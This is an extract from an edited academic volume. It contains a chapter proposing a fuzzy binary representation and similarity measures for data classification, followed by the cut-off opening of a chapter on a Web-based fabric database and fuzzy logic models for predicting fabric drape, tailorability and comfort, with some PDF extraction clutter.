IBM, DB2, and DB2 Universal Database are trademarks of International Business Machines Corporation in the United States, other countries, or both. Microsoft is a trademark of Microsoft Corporation in the United States, other countries,
3
4
Oracle Database, www.oracle.com/ip/deploy/database/oracle9i/ Microsoft SQL Server, www.microsoft. com/sql/ MySql open source database, www.mysql. com SQL/XML standard, http://www.sqlx.org/
This work was previously published in Challenges of Managing Information Quality in Service, edited by L. Al-Hakim, pp. 115-135, copyright 2007 by IGI Publishing (an imprint of IGI Global).
2156
2157
Chapter 7.12
Handling Fuzzy Similarity for Data Classification Roy Gelberd Bar-Ilan University, Israel Avichai Meged Bar-Ilan University, Israel
INTRODUCTION Representing and consequently processing fuzzy data in standard and binary databases is problematic. The problem is further amplified in binary databases where continuous data is represented by means of discrete ‘1’ and ‘0’ bits. As regards classification, the problem becomes even more acute. In these cases, we may want to group objects based on some fuzzy attributes, but unfortunately, an appropriate fuzzy similarity measure is not always easy to find. The current paper proposes a novel model and measure for representing fuzzy data, which lends itself to both classification and data mining. Classification algorithms and data mining attempt to set up hypotheses regarding the assigning of different objects to groups and classes on the basis of the similarity/distance between them (Estivill-Castro & Yang, 2004) (Lim, Loh & Shih, 2000) (Zhang & Srihari, 2004). Classification
algorithms and data mining are widely used in numerous fields including: social sciences, where observations and questionnaires are used in learning mechanisms of social behavior; marketing, for segmentation and customer profiling; finance, for fraud detection; computer science, for image processing and expert systems applications; medicine, for diagnostics; and many other fields. Classification algorithms and data mining methodologies are based on a procedure that calculates a similarity matrix based on similarity index between objects and on a grouping technique. Researches proved that a similarity measure based upon binary data representation yields better results than regular similarity indexes (Erlich, Gelbard & Spiegler, 2002) (Gelbard, Goldman & Spiegler, 2007). However, binary representation is currently limited to nominal discrete attributes suitable for attributes such as: gender, marital status, etc., (Zhang & Srihari, 2003). This makes the binary approach for data representation unattractive for widespread data types.
The current research describes a novel approach to binary representation, referred to as Fuzzy Binary Representation. This new approach is suitable for all data types - nominal, ordinal and as continuous. We propose that there is meaning not only to the actual explicit attribute value, but also to its implicit similarity to other possible attribute values. These similarities can either be determined by a problem domain expert or automatically by analyzing fuzzy functions that represent the problem domain. The added new fuzzy similarity yields improved classification and data mining results. More generally, Fuzzy Binary Representation and related similarity measures exemplify that a refined and carefully designed handling of data, including eliciting of domain expertise regarding similarity, may add both value and knowledge to existing databases.
entity (e.g., record, object) has or lacks a given value, respectively (Spiegler & Maayan, 1985). In this way, we can have a binary representation for discrete and continuous attributes. Table 1 illustrates binary representation of a database consists of five entities with the following two attributes: Marital Status (nominal) and Height (continuous).
BACKGROUND
Similarity Measures
Binary Representation
Similarity/distance measures are essential and at the heart of all classification algorithms. The most commonly-used method for calculating similarity is the Squared Euclidean measure. This measure calculates the distance between two samples as the square root of the sums of all squared distances between their properties (Jain & Dubes, 1988) (Jain, Murty & Flynn, 1999). However, these likelihood-similarity measures are applicable only to ordinal attributes and cannot
Binary representation creates a storage scheme, wherein data appear in binary form rather than the common numeric and alphanumeric formats. The database is viewed as a two-dimensional matrix that relates entities according to their attribute values. Having the rows represent entities and the columns represent possible values, entries in the matrix are either ‘1’ or ‘0’, indicating that a given
2158
• •
Marital Status, with four values: S (single), M (married), D (divorced), W (widowed). Heights, with four values: 1.55, 1.56, 1.60 and 1.84.
However, practically, binary representation is currently limited to nominal discrete attributes only. In the current study, we extend the binary model to include continuous data and fuzzy representation.
Handling Fuzzy Similarity for Data Classification
be used to classify nominal, discrete, or categorical attributes, since there is no meaning in placing such attribute values in a common Euclidean space. A similarity measure, which applicable to nominal attributes and used in our research is the Dice (Dice 1945). Additional binary similarity measures were developed and presented (Illingworth, Glaser & Pyle, 1983) (Zhang & Srihari, 2003). Similarities measures between the different attribute values, as proposed in Zadeh (1971) model, are essential in the classification process. In the current study we use similarities between entities and between entity’s attribute values to get better classification. Following former reserches, (Gelbard & Spiegler, 2000) (Erlich, Gelbard & Spiegler, 2002), the current study also uses Dice measure.
Fuzzy Logic The theory of Fuzzy Logic was first introduced by Lotfi Zadeh (Zadeh, 1965). In classical logic, the only possible truth-values are true and false. In Fuzzy Logic; however, more truth-values are possible beyond the simple true and false. Fuzzy logic, then, derived from fuzzy set theory, is designed for situations where information is inexact and traditional digital on/off decisions are not possible. Fuzzy sets are an extension of classical set theory and are used in fuzzy logic. In classical set theory, membership of elements in relation to
a set is assessed according to a clear condition; an element either belongs or does not belong to the set. By contrast, fuzzy set theory permits the gradual assessment of the membership of elements in relation to a set; this is described with the aid of a membership function . An element mapped to the value 0 means that the member is not included in the given set, ‘1’ describes a fully included member, and all values between 0 and 1 characterize the fuzzy members. For example, the continuous variable “Height” may have three membership functions; stand for “Short”, “Medium” and “Tall” categories. An object may belong to few categories in different membership degree, e.g 180 cm. height may belong to the “Medium” and “Tall” categories, in different membership degree expressed by the range [0,1]. The membership degrees are returned from the membership functions. We can say that a man whose height is 180 cm. is “slightly medium” and a man whose height is 200 cm. is of “perfect tall” height. Different membership functions might represent different membership degrees. Having several possibilities for membership functions is part of the theoretical and practical drawbacks in Zada’s model. There is no “right way” to determine the right membership functions (Mitaim & Kosko, 2001). Thus, a membership function may be considered arbitrary and subjective. In the current work, we make use of membership functions to develop the enhanced similarity calculation for use in classification of fuzzy data.
Table 2. Fuzzy similarity matrixes of the marital status and height attributes
2159
Handling Fuzzy Similarity for Data Classification
FUZZY SIMILARITY REPRESENTATION Standard Binary Representation exhibits data integrity in that it is precise, and preserves data accuracy without either loss of information or rounding of any value. The mutual exclusiveness assumption causes the “isolation” of each value. This is true for handling discrete data values. However, in dealing with a continuous attribute, e.g. Height, we want to assume that height 1.55 is closer to 1.56 than to 1.60. However, when converting such values into a mutually exclusive binary representation (Table 1), we lose these basic numerical relations. Similarity measures between any pair with different attribute values is always 0, no matter how similar the attribute values are. This drawback makes the standard binary representation unattractive for representing and handling continuous data types. Similarity between attribute values is also needed for nominal and ordinal data. For example, the color “red” (nominal value) is more similar to the color “purple” than it is to the color “yellow”.
Table 3. Fuzzy similarity table
Table 4. Fuzzy binary representation table
2160
In ranking (questionnaires) a “1” satisfactory rank (ordinal variable) might be closer to the “2” rank than to the “5” rank. The absence of these similarity “intuitions” are of paramount importance in classification and indeed may cause some inaccuracies in classification results. The following sections present a model that adds relative similarity values to the data representation. This serves to empower the binary representation to better handle both continuous and fuzzy data and improves classification results for all attribute types.
Model for Fuzzy Similarity Representation In standard binary representation, each attribute (which may have several values, e.g., color: red, blue, green, etc.) is a vector of bits where only one bit is set to “1” and all others are set to “0”. The “1” bit stands for the actual value of the attribute. In the Fuzzy Binary Representation, the zero bits are replaced by relative similarity values.
Handling Fuzzy Similarity for Data Classification
The Fuzzy Binary Representation is viewed as a two-dimensional matrix that relates entities according to their attribute values. Having the rows represent entities and the columns represent possible values, entries in the matrix are fuzzy numbers in the range [0,1], indicating the similarity degree of specific attribute value to the actual one, where ‘1’ means full similarity to the actual value (this is the actual value), ‘0’ means no similarity al all and all other values means partial similarity. The following example illustrates the way for creating the Fuzzy Binary Representation: Let’s assume we have a database of five entities and two attributes represented in a binary representation as illustrated in Table1. The fuzzy similarities between all attribute values are calculated (next section describes the calculation process) and represented in a two-dimensional “Fuzzy Similarity Matrix”, wherein rows and columns stand for the different attributes’ values, and the matrix cells contain the fuzzy similarity between the value pairs. The Fuzzy Similarity Matrix is symmetrical. Table 2 illustrates fuzzy similarity matrixes for Marital Status and Height attributes. The Marital Status similarity matrix shows that the similarity between Single and Widow is “high” (0.8), while there is no similarity between Single and Married (0). The Height similarity matrix shows that the similarity between 1.56 and 1.60 is 0.8 (“high” similarity), while the similarity between 1.55 and 1.84 is 0 (not similar at all). These similarity matrixes can be calculated automatically, as is explained in the next section. Now, the zero values in the binary representation (Table 1) are replaced by the appropriate similarity value (Table 2). For example, in Table 1, we will replace the zero-bit stands for Height 1.55 of the first entity, with the fuzzy similarity between 1.55 and 1.60 (the actual attribute value), as indicated in the Height fuzzy similarity matrix (0.7). Table 3 illustrates the fuzzy representation accepted after such replacements. It should be noted that the similarities indicated
in the fuzzy similarity table relate to the similarity between the actual value of the attribute (e.g. 1.60 in entity 1) and the other attributes’ values (e.g. 1.55, 1.56 and 1.84). Next, the fuzzy similarities, presented in decimal form, are converted into a binary format – the Fuzzy Binary Representation. The conversion should allow similarity indexes like Dice. To meet this requirement, each similarity value is represented by N binary bits, where N is determined by the required precision. For one- tenth precision, 10 binary bits are needed, for one-hundredth precision, 100 binary bits are needed. For ten bits precision fuzzy similarity “0” will be represented by ten ‘0’s, the fuzzy similarity “0.1” will be represented by nine ‘0’ followed by one ‘1’, the fuzzy similarity “0.2” will be represented by eight ‘0’s followed by two ‘1’s and so on till the fuzzy similarity “1” which will be represented by ten ‘1’s. Table 4 illustrates the conversion from fuzzy representation (Table 3) to fuzzy binary representation. The Fuzzy Binary Representation illustrated in Table 4 is suitable for all data types (discrete and continuous) and, with the new knowledge (fuzzy similarities values) it contains, a better classification is expected. The following section describes the process for similarity calculations necessary for this type of Fuzzy Binary Representation.
Fuzzy Similarity Calculation Similarity calculation between the different attribute values is not a precise science, i.e., there is no one way to calculate it, just as there is no one way to develop membership functions in the Fuzzy Logic world. We suggest determining similarities according to the attribute type. A domain expert should evaluate similarity for nominal attributes like “Marital Status”. For example, Single, Divorced and Widowed are considered “one person”, while Married is considered as “two people”. There-
2161
Handling Fuzzy Similarity for Data Classification
Table 5. Entities similarity
fore, Single may be more similar to Divorced and Widowed than it is to Married. On the other hand “Divorced” is one that once was married, so may be it is more similar to Married than to single. In short, similarity is a relative, rather than an absolute measure, as there is hardly any known automatic way to calculate similarities for such attributes and therefore a domain expert is needed. Similarity for ordinal data like satisfactory rank can be calculated in the same way as for nominal or continuous attributes depending on the nature of attributes’ values. Similarity for continuous data like Height can be calculated automatically. Unlike nominal attributes, in continuous data there is an intuitive meaning to the “distance” between different values. For example, as regards the Height attribute, the difference between 1.55 and 1.56 is smaller than the distance between 1.55 and 1.70; therefore, the similarity is expected to be higher accordingly. For continuous data, an automatic method can be constructed, as showed, to calculate the similarities. Depending on the problem domain, a continuous attribute can be divided into one or more fuzzy sets (categories), e.g., the Height attribute
2162
can be divided into three sets: Short, Medium and Tall. A membership function for each set can be developed. The calculated similarities depend on the specified membership functions; therefore, they are referred to here as fuzzy similarities. The following algorithm can be used for similarity calculations of continuous data: For each pair of attribute values (v1 and v2) For each membership function F Similarities (v1, v2) = 1 - distance between F(v1) and F(v2) Similarity (v1, v2) = Maximum of the calculated Similarities Now that we have discussed both a model for Fuzzy Binary Representation and a way to calculate similarities, we will show the new knowledge (fuzzy similarities) added to the standard binary representation improve the similarity measures between different entities, as discussed in the next section.
Handling Fuzzy Similarity for Data Classification
COMPARING STANDARD AND FUZZY SIMILARITIES In this section, we compare standard and fuzzy similarities. The similarities were calculated according to the Dice index for the example represented in Table 4. Table 5 combines similarities of the different entities related to (a) Martial Status (nominal), to (b) Height (continuous) and to (c) both the Marital Status and Height attributes. Several points and findings arise from the representations shown above (Table 5). These are briefly highlighted below: 1.
2.
3.
In our small example, a nominal attribute (Marital Status) represented in standard binary representation cannot be used for classification. In contrast, the Fuzzy Binary Representation, with a large diversity of similarities results, will enable better classification. Grouping entities with a similarity that is equal to or greater than 0.7 yields a class of entities 2, 3, 4 and 5, which represent Single, Divorced and Widowed that belong to the set “one person”. For a continuous attribute (Height) represented in the standard binary representation, classification is not possible. In contrast, the Fuzzy Binary Representation with diversity in similarities results will, once again, enable better classification. Entities 1 and 5 have absolute similarity (1), since for the Height attribute they are identical. Entities 2 and 4 (similarity = 0.94) are very similar, since they represent the almost identical heights of 1.55 and 1.56, respectively. Classification based on these two entities is possible due to diversity of similarities. The same phenomena presented for a single attribute (Marital Status or Height) exist also for the both attributes (Marital Status +
Height) when are taking together. Similarity greater than 0.8 is used to group entities 2, 4 and 5, which represent “one person” around 1.56 meters height. Two important advantages of the novel Fuzzy Binary Representation detailed in the current work over the standard binary representation are suggested: (1) It is practically suitable to all attribute types. (2) It improves classification results.
FUTURE TRENDS The current work improves classification by adding new similarity knowledge to the standard representation of data. Further research can be conducted to calculate the interrelationship between the different attributes, i.e., the crosssimilarities among attributes such as marital status and height. Understanding such interrelationships might further serve to refine the classification and data mining results. Another worthwhile research direction is helping the human domain expert to get the “right” similarities, and thus choose the “right” membership functions. A Decision Support System may provide a way in which to structure the similarity evaluation of the expert and make his/her decisions less arbitrary.
CONCLUSION In the current paper, the problems of representing and classifying data in databases were addressed. The focus was on Binary Databases, which have been shown in recent years to have an advantage in classification and data mining. Novel aspects for representing fuzziness were shown and a measure of similarity for fuzzy data was developed and described. Such measures are required, as similarity calculations are at the heart of any classification algorithm. Classification examples were illustrated. 2163
Handling Fuzzy Similarity for Data Classification
The evaluating of similarity measures shows that standard binary representation is useless when dealing with continuous attributes for classification. Fuzzy Binary Representation reforms this drawback and results in promising classification based on continuous data attributes. In addition, adding fuzzy similarity was also shown to be useful for regular (nominal, ordinal) data to ensure better classification. Summarily, fuzzy representation improves classification results for all attribute types.
REFERENCES Dice, L.R. (1945). Measures of the amount of ecological association between species. Ecology, 26(3), 297-302. Erlich, Z., Gelbard, R. & Spiegler, I. (2002). Data Mining by Means of Binary Representation: A Model for Similarity and Clustering. Information Systems Frontiers, 4(2), 187-197.
Data Clustering: A Review. ACM Communication Surveys, 31(3), 264-323. Lim, T.S., Loh, W.Y. & Shih, Y.S. (2000). A Comparison of Prediction Accuracy, Complexity, and Training Time of Thirty-Three Old and New Classification Algorithms. Machine Learning, 40(3), 203-228. Mitaim, S. & Kosko, B. (2001). The Shape of Fuzzy Sets in Adaptive Function Approximation. IEEE Transactions on Fuzzy Systems, 9(4), 637-656. Spiegler, I. & Maayan, R. (1985). Storage and retrieval considerations of binary data bases. Information Processing and Management, 21(3), 233-254. Zadeh, L.A., (1965). Fuzzy Sets. Information and Control, 8(1), 338-353. Zadeh, L.A., (1971). Similarity Relations and Fuzzy Ordering. Information Sciences, 3, 177200.
Estivill-Castro, V. & Yang J. (2004). Fast and Robust General Purpose Clustering Algorithms. Data Mining and Knowledge Discovery, 8(2), 127-150.
Zhang, B. & Srihari, S.N. (2003). Properties of Binary Vector Dissimilarity Measures. In, Proc. JCIS Int’l Conf. Computer Vision, Pattern Recognition, and Image Processing, 26-30.
Gelbard, R. & Spiegler, I. (2000). Hempel’s raven paradox: a positive approach to cluster analysis. Computers and Operations Research, 27(4), 305-320.
Zhang, B., & Srihari, S.N. (2004). Fast k-Nearest Neighbor Classification Using Cluster-based Trees. IEEE Transactions on Pattern Analysis and Machine Intelligence, 26(4), 525-528.
Gelbard, R., Goldman, O. & Spiegler, I. (2007). Investigating Diversity of Clustering Methods: An Empirical Comparison”, Data & Knowledge Engineering, 63(1), 155-166. Illingworth, V., Glaser, E.L. & Pyle, I.C. (1983). Hamming distance. In, Dictionary of Computing, Oxford University Press, 162-163. Jain, A.K. & Dubes, R.C. (1988). Algorithms for Clustering Data. Prentice Hall. Jain, A.K., Murty, M.N. & Flynn, P.J. (1999).
2164
KEY TERMS Classification: The partitioning of a data set into subsets, so that the data in each subset (ideally) share some common traits - often proximity according to some defined similarity/distance measure. Data Mining: The process of automatically searching large volumes of data for patterns, us-
Handling Fuzzy Similarity for Data Classification
ing tools such as classification, association rule mining, clustering, etc. Database Binary Representation: A representation where a database is viewed as a twodimensional matrix that relates entities (rows) to attribute values (columns). Entries in the matrix are either ‘1’ or ‘0’, indicating that a given entity has or lacks a given value. Fuzzy Logic: An extension of Boolean logic dealing with the concept of partial truth. Fuzzy logic replaces Boolean truth values (0 or 1, black or white, yes or no) with degrees of truth.
Fuzzy Set: An extension of classical set theory. Fuzzy set theory used in Fuzzy Logic, permits the gradual assessment of the membership of elements in relation to a set. Membership Function: The mathematical function that defines the degree of an element’s membership in a fuzzy set. Membership functions return a value in the range of [0,1], indicating membership degree. Similarity: A numerical estimate of the difference or distance between two entities. The similarity values are in the range of [0,1], indicating similarity degree.
This work was previously published in Encyclopedia of Artificial Intelligence, edited by J. Dopico, J. De la Calle, and A. Sierra, pp. 796-802, copyright 2009 by Information Science Reference (an imprint of IGI Global).
2165
2166
Chapter 7.13
Fabric Database and Fuzzy Logic Models for Evaluating Fabric Performance Yan Chen Louisiana State University Agricultural Center, USA Graham H. Rong Massachusetts Institute of Technology, USA Jianhua Chen Louisiana State University, USA
ABSTRACT A Web-based fabric database is introduced in terms of its physical structure, software system architecture, basic and intelligent search engines, and various display methods for search results. A fuzzy linear clustering method is used to predict fabric drape coefficient from fabric mechanical and structural properties. Experimental data indicate that fuzzy linear clustering is quite effective for this purpose. A hybrid method combining fuzzy linear clustering with K-nearest neighbor is also applied for the prediction of the fabric drape coefficient with improved prediction accuracy. The study also reveals that the fuzzy linear clustering method can also be used for
predicting fabric tailorability with good prediction accuracy. Mathematical principles of fuzzy comprehensive evaluation are summarized and a typical application for assessing fabric comfort is exhibited. Through the fuzzy calculation, a single numerical value is produced to express female preferences for six fabric types for use in blouses, slacks, and underpants with respect to fabric property changes in an incremental-wear trial. Finally, a neuro-fuzzy computing technique for evaluating nonwoven fabric softness is presented. The combinational use of the fuzzy logic models (CANFIS) and the neural network method makes a significant step toward launching a fabric database application for neural network computing as a routine laboratory evaluation.
Fabric Database and Fuzzy Logic Models for Evaluating Fabric Performance
INTRODUCTION Fabric end-use performance is determined by fabric mechanical and physical properties. Many aspects of performance, such as softness, tactility, and comfort, are assessed by physiological responses and subjective judgment only because of their physical complexity and users’ preference. Instrumental approaches for directly measuring these fabric quality features are still limited to date. However, with the availability of high-performance computers and advanced computing techniques, opportunities to solve these problems become more realistic. Internet technology is making a notable impact on the traditional textile industry. This revolutionary information technology is helping textile manufacturers to enhance their competitiveness in production management and marketing. As Internet users communicate with each other across networked computers, diverse business applications, ranging from the design of textile products to clothing retailing, are popping up through the Internet. For instance, to meet fashion designers’ increasing desire for online fashion tracking, a Web site called Worth Global Style Network (WGSN, http://www.wgsn.com) was established in London. This Web site is providing the fashion and style industries with trend-watching news and services, including resources for yarn, fabrics, and garment accessories, and graphics of updated design styles and fashion trends. The information, which covers more than 250,000 pages, comes from a team of 150 designers, trend analysts, journalists, and photographers all over the world. Another Web site, TextileWeb (http:// www.textileweb.com), was developed as a community for professionals of the textile industry. It provides product information (buyers’ guide and marketplace) and professional services (job search and training). Online shopping is the ultimate desire for both manufacturers and consumers and is driving Internet technology toward e-commerce.
More and more clothing retailers favor a strong Internet presence to promote online shopping. A recent example of this can be seen with the retailer Neiman Marcus launching a $24 million Web site investment with new multimedia applications (Kemp & Lewis, 2000). The company hopes that the new investment will extend its merchandising strategy and promise to make the online shopping experience more realistic. Today, apparel retailing holds the second place for online sales, next to long-term e-business leader online travel. It is reported that the online sales of apparel, footwear, and accessories have risen to $18.3 billion in 2006, and are expected to reach $22.1 billion in 2007 (Dilworth, 2007). All these figures indicate that the textile and clothing industries will further stimulate the IT industry to develop new technologies for accelerating ecommerce capabilities. Although the IT achievements are significant, online fabric sourcing and shopping still has many obstacles to overcome. Technology, customer service, and distribution management are all challenging apparel manufacturers and retailers. From a technical point of view, apparel design and manufacturing is still more a kind of art than science. For example, fabric quality is mainly assessed by experts’ subjective impression by hand. This traditional skill is still commonly used by fabric finishers, bespoke tailors, and even mass-production garment makers. Thus, few apparel designers care about the importance of fabric physical properties and about how to determine these properties and incorporate them into their designs. Garment making is on a trial-and-error basis. Garment quality relies largely on technicians’ experience and operators’ skill. However, with the severe shortage of experienced textile engineers and hand evaluation experts, the traditional approach is now not practical. Moreover, as automation increases in garment manufacturing, the determination of fabric properties becomes more and more necessary for the control of interaction between making-up machines and fabric
2167
Fabric Database and Fuzzy Logic Models for Evaluating Fabric Performance
materials. Instrumental measurement of fabric properties is therefore an important technology (Hearle, 1993a). Online evaluation of fabric performance in terms of hand, comfort, tailorability, and drapability mainly depends on two technical aspects. One is the development of a fabric database that includes instrumental data for describing fabric mechanical and physical properties. The other is the identification of mathematical approaches capable of establishing physical models for the prediction or grading of fabric performance. Instrumental methods for measuring fabric’s different properties are mostly available today. The computing techniques for Web-based fabric databases and intelligent search engines can also be obtained inexpensively to meet various end-use needs in the textile and apparel industries. A key issue is the employment of the right algorithms for the right evaluation models. In reality, the search criteria for fashion trends and suitable fabric materials are often fuzzy. For example, the answer to whether or not a particular garment design is fashionable depends on many factors and cannot be easily quantified. Similarly, the judgment of whether or not (or how much) a fabric material is suitable for a specific garment, or whether a garment made from a fabric is comfortable is a fuzzy one. There is also quite some degree of fuzziness in judging whether a fabric is soft or not. Moreover, various fabric properties are related to each other in a fuzzy way. The fabrics stored in the online database are characterized by more than a dozen mechanical properties (such as tensile, shear, etc.) and fabric contents, structure, and end-use information. In addition, a fabric also has other properties such as appearance and tailorability. Intuitively, these more intangible properties are related to mechanical properties of a fabric in a subtle way. A systematic prediction method is desired so that fuzzy queries for fabrics with desired appearance and performance such as tailorability can be answered. In spite of some works on fabric evaluation and classification (Y.
2168
Chen, Collier, & Collier, 1999; Y. Chen, Collier, Hu, & Quebedeaux, 2000), little is known in the textile literature for predicting fabric appearance and tailorability as well as comfort and softness from its mechanical properties. This chapter introduces a fabric database and specific fuzzy logic methods in the application of assessing the softness, comfort, drapability, and tailorability of apparel and consumer fabrics according to fabric mechanical and physical properties. The physical structure and software system architecture of the Web-based database is described. Basic and intelligent search engines provided by this database are demonstrated. The searched results can be displayed on the Web page in different formats, such as tables, charts, and dynamic images. Mathematical principles of fuzzy comprehensive evaluation are summarized. The algorithms of fuzzy C-means clustering and fuzzy linear clustering (FLC) are illustrated in the application for establishing the intelligent search engines. A hybrid neuron-fuzzy model called coactive neuro-fuzzy inference systems (CANFIS) is also introduced for use as a preprocessor to perform fuzzy transformation in neural network computing. As an application exhibition, three case studies are presented. The first case is the use of a hybrid method combining the K-nearest neighbor method with fuzzy linear clustering to improve the prediction accuracy for fabric drapability. The second case is the fuzzy comprehensive evaluation of apparel fabric comfort using the fuzzy model M(•, ⊕). The last case is the application of the neuron-fuzzy model for grading fabric softness. The combinational use of the fuzzy logic models and neural network method makes a significant step toward launching a fabric database application on an office PC. This helps meet the industries’ requirements for routine implementation, dynamic update, and cost effectiveness of evaluating textile material quality.
Fabric Database and Fuzzy Logic Models for Evaluating Fabric Performance
PROGRESS OVERVIEW Fuzzy sets and neural networks have been used extensively to solve problems in engineering and science, health care, and financial applications. Applications of fuzzy and neural computing techniques in the fabric and apparel manufacturing industry are gaining more interest from researchers in IT and textile fields. A fuzzy logic based approach was reported that could detect fabric defects in real time (during the weaving process) and control the weaving process (Dorrity, Vachtsevanos, & Jasper, 1996). A back-propagation neural network was used to detect fabric defects (Kuo & Lee, 2003). The researchers have also done work in using fuzzy C-means clustering for automatic fabric print pattern recognition (Kuo, Shih, Kao, & Lee, 2005; Kuo, Shih, & Lee, 2004). We have presented our work in using fuzzy linear clustering for fabric drape prediction (J. Chen, Chen, Zhang, & Gider, 2002). Fuzzy clustering has been used widely in various applications. The fuzzy linear clustering method was developed independently by two different research groups (Hathaway & Bezdek, 1993; Kundu & Chen, 1994). The study showed that the fuzzy linear clusters possess the nice property of being invariant under linear transformations. The applications of fuzzy linear clustering in fuzzy control rule learning have also been investigated (J. Chen & Kundu, 1999; Mikulcic & Chen, 1996; Sabharwal & Chen, 1996). These results indicate that the fuzzy linear clustering method is very useful for capturing linear patterns in data, and that the method has a strong generalization capability for function approximation. We use fuzzy linear clustering for fabric drape prediction and fabric tailorability prediction in this current work. Approaches to evaluating fabric hand can be categorized as subjective assessment and objective assessment. Many textile experts have advocated significantly to the study of subjective assessment and have contributed much to the research literature (Brand, 1964; Ellis & Garnsworthy,
1980; Howorth, 1964). Other textile scientists made great efforts in objective evaluation of fabric hand (Kawabata & Niwa, 1989; Pan, Yen, Zhao, & Yang, 1988a, 1988b, 1988c; Postle & Mahar, 1982). Recently, the method of fuzzy comprehensive evaluation was used to grade fabric hand (Raheel & Liu, 1991; Rong & Slater, 1992). A multivariate statistical method of discriminant analysis was also proposed to establish a nonlinear discriminant function for predicting end uses of apparel fabrics (Y. Chen & Collier, 1997). With the rapid development of computer hardware and software, neural network techniques have been adopted for modeling complex nonlinear problems of textiles. Many neural network models, such as parallel distributed processing, and connectivist and adoptive systems, were applied to the determination of fiber spinability (Pynckels, Kiekens, Sette, Langenhove, & Impe, 1995), yarn strength prediction (Cheng & Adams, 1995), fabric classification (Barrett, Clapp, & Titus, 1996), fabric faults identification (P. W. Chen, Liang, Yau, & Lin, 1998), fabric performance evaluation (Gong & Chen, 1999), and seam pucker rating (Chang & Tae, 1997).
FABRIC DATABASE An initial objective of this research is to establish an online intelligent database server that will help clothing manufacturers and retailers to pinpoint desired fabrics that match fashion trends in color, drape, and style; to narrow fabric selections to fabrics possessing good physical properties that insure high quality of garment products; to find better-buy fabrics; and to locate fabric manufacturers and determine earliest shipping dates of roll materials. This database server is able to provide a dynamic fabric databank consisting of structural parameters, mechanical properties, fabric drape images, making-up process information, and contact information of fabric manufacturers. This chapter reports a research progress in the
2169
Fabric Database and Fuzzy Logic Models for Evaluating Fabric Performance
Figure 1. Database structure
Client
ter et
Database
Client
Server Fabric Bank Client
establishment of the database server, acquisition of apparel fabrics and fabric property measurement, Web site design and activation, database construction, and data mining programming.
Physical Structure The physical structure of this online fabric database is illustrated in Figure 1. The system can be accessed by any client through the Internet. A central piece of this system is a networked PC server running Microsoft Active Page Server and DB2 database software. The server stores all fabric
Figure 2. Database system architecture
2170
information (fabric bank) and database codes. In the present stage, the database includes 185 apparel fabrics from different fabric manufacturers. Mechanical properties of these fabrics have been tested using the instruments of the Kawabata Evaluation System for Fabrics (KES-FB). The KES-FB instruments consist of a tensile and shear tester, a pure bending tester, a compression tester, and a friction and roughness tester that can be used delicately for measuring basic fabric deformations (Kawabata & Niwa, 1989). Fabric drapability has been measured using a Cusick drape tester. On this tester, a fabric circle
Fabric Database and Fuzzy Logic Models for Evaluating Fabric Performance
is draped over a pedestal, and the draped image (shadow) is projected on a top plate above the pedestal. A paper ring having the same diameter as that of the fabric circle is used to trace the drape shadow. The traced-shadow part of the paper ring is cut and weighed. The ratio of the paper weight of the traced shadow vs. the weight of the original paper ring is defined as the drape coefficient. The lower the drape coefficient, the better the fabric drapability. Dynamic fabric drape images have been videotaped using a digital video camera. Fabric structural, material, and contacting information was also inputted into the database.
Software System Architecture The software system for the fabric database is a Web-based application written in Java. As shown in Figure 2, the system consisted of three major components: a graphical user interface, an intelligent search engine, and data mining and learning algorithms. A Web page has been designed and used as a graphical user interface. This Web page is located on a school’s Web server (http://www.
textilelab.huec.lsu.edu). The intelligent search engine supports several types of user queries. The simplest type of query is a search request that specifies particular values of fabric mechanical properties. For this type of queries, a straightforward search with a certain percentage of searching accuracy for all measured fabric properties can be performed. Matched fabrics are displayed as an answer for the search. Subsequently, clients can further pull out information about fabric manufacturers and fabric prices upon different users’ needs. Fabric mechanical properties such as extension, bending, friction, and so forth are closely related to fabric drapability and tailorability. Such correlation typically takes mechanical properties as independent variables and models the drapability or tailorability as a function of these independent variables. Therefore, a key problem is to discover such correlation patterns between fabric properties and draping or processing performance using computing techniques of data classification. Obtained correlation patterns can then be used for predicting drapability or tailorability of new
Figure 3. User’s interface for accurate search
2171
Fabric Database and Fuzzy Logic Models for Evaluating Fabric Performance
fabric products or customer fabrics, for example, whether the fabric drapes greatly, moderately, or slightly. In this research, a method of fuzzy linear clustering is applied for data mining and pattern recognition in the established database. Algorithmic details for this method can be found in the related literature (Bezdek, 1980; J. Chen et al., 2002).
Search Options The present database provides three types of search options: accurate search, criteria search, and intelligent search. The accurate search helps users find a fabric with the specific mechanical properties they require. The search result can be a perfect match to users’ input, or can have a 10% to 30% variation in the input. This search method is useful when users want to pinpoint a particular fabric for which mechanical properties need to be strictly controlled. For example, as-
Figure 4. Fabric data display
2172
sume that a garment maker has completed a batch of men’s shirts and the mechanical properties of the used shirting fabric have been measured using the Kawabata instruments and stored as a fingerprint in a computer system. The next time the company acquires a new order of the men’s shirt, fabric purchase staff can search for a new fabric supplier using the company’s filed fabric fingerprint. Figure 3 illustrates a sample of the accurate search. The criteria search allows users to search for fabrics by different categories, such as end uses, fiber types, fabric structures, or manufacturers. In the present state, the database provides a criteria search for end uses only. The database intelligent search is based on search engines that run special codes for data mining and pattern learning in response to clients’ needs for evaluating fabric quality features, such as making-up processability (tailorability), hand and drape, and durability. In the present work, an intelligent search engine for predicting the fabric
Fabric Database and Fuzzy Logic Models for Evaluating Fabric Performance
drape coefficient was developed. For each time a search is executed, the search engine runs five times and outputs a mean value of the prediction. Overall accuracy for the drape prediction is about 88% on test data.
Fabric Data Display The database has a Web page that allows users to browse the fabric bank by selecting fabric IDs and fabric properties. Once a fabric search is completed, matched fabrics are listed by the fabric ID. Fabric data can be displayed by clicking any individual fabric ID (Figure 4). A dynamic drape image of a selected fabric can be viewed by clicking Click to View Video. The video runs 5 seconds of dynamic drape images for each fabric. This function of the database provides a visual tool for apparel designers and fabric producers to assess real fabric drape appearance.
FUZZY CLUSTERING FOR PREDICTING FABRIC DRAPE/TAILORABILITY The Problem and Fuzzy Linear Clustering Method The problem addressed in this section is the following. Suppose we know the major mechanical properties (such as shear, tensile, etc.) of a fabric. Can we predict from these properties whether this fabric would drape heavily or not? Or similarly, can we predict whether a fabric is easy to sew (tailor) or not given knowledge of the fabric’s mechanical properties? Thus, the problem to be addressed is a fabric property (draping and/or tailorability) estimation or prediction from other related properties. It is quite natural to desire a method of systematically estimating fabric tailorability. Fabric tailorability depends on many properties of the
